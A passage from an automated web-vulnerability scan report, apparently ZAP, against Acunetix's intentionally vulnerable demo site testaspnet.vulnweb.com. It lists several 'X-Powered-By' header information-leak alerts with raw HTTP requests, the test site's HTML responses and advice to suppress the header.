          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        27. POST http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Content-Length: 1415
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1415 bytes)
          Response
          Status line and header section (178 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Length: 0
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          
          
          Response body (0 bytes)
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        28. POST http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Content-Length: 1721
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1721 bytes)
          Response
          Status line and header section (178 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Length: 0
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          
          
          Response body (0 bytes)
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        29. POST http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Content-Length: 1539
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1539 bytes)
          Response
          Status line and header section (178 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Length: 0
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          
          
          Response body (0 bytes)
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        30. POST http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        31. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1197
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1197 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13281
          
          
          Response body (13281 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        32. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
